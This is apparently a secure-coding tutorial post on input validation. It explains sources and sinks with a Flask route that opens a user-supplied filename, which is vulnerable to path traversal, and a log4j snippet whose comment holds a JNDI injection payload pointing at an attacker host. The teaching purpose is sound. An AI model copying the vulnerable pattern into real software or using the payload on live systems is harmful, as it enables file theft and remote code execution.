---
title: 1.3 General Rule Of Thumb
author: Riccardo ten Cate
date: 03-12-2024
category: Jekyll
layout: post
---

The general rule of thumb in input validation is to avoid giving an attacker control over the object that is passed into a function, parser, or operator. This means that user input should not be directly passed into a function, but rather should be validated and sanitized first. For example, in the case of a file operator, an attacker could inject malicious data and cause a directory traversal attack.

So, what exactly does that mean?

### example-1

```python
@app.route("/home", methods=['POST'])
def home():
    filename = request.form['filename']
    if filename == "":
        filename = "default.txt"
    f = open(filename, 'r')
    read = f.read()
    return render_template("index.html", read=read)
```

In this example, we observe that when the so-called _**source**_
`filename = request.form['filename']`
  
is used in the following _**sink**_ or in this case a **_File operator_**  
`f = open(filename,'r')`  
  
this will lead to a security vulnerability called Local **_file inclusion_**|| **_Directory traversal_** attack. This attack was preventable by applying the secure design principles mentioned above. We will dig further into this example and how to mitigate it in the chapter that covers the _white listing_ mitigation strategy.

### example-2

Even though that at the time of writing the code `log4j` did not directly impose a great security risk, a lot of trouble could have been prevented by not directly writing user-supplied input directly into the `log.error()` function.

```java
import org.apache.log4j.Logger;
import java.io.*;
import java.util.*;

public class log4jExample{
    /* Get actual class name to be printed on */
    static Logger log = Logger.getLogger(log4jExample.class.getName());

    public static void main(String[] args){
        // input could look like:
        // ${jndi:rmi://hackerbox.com:1337/exploit}
        log.error(USER_INPUT_HERE);
    }
}
```

The same principles as mentioned in the **_directory / path traversal_** example are applied to this as well. Don't give an attacker full control over an _**object**_ that goes into a _**sink**_. More in-depth information about the **_Log4J_** Vulnerability can be found in the _**Sources**_ Section

In conclusion, input validation is an essential aspect of software security and should be given the attention it deserves. By using the appropriate validation strategies and following best practices, software systems can be made more secure and better protected against malicious attacks.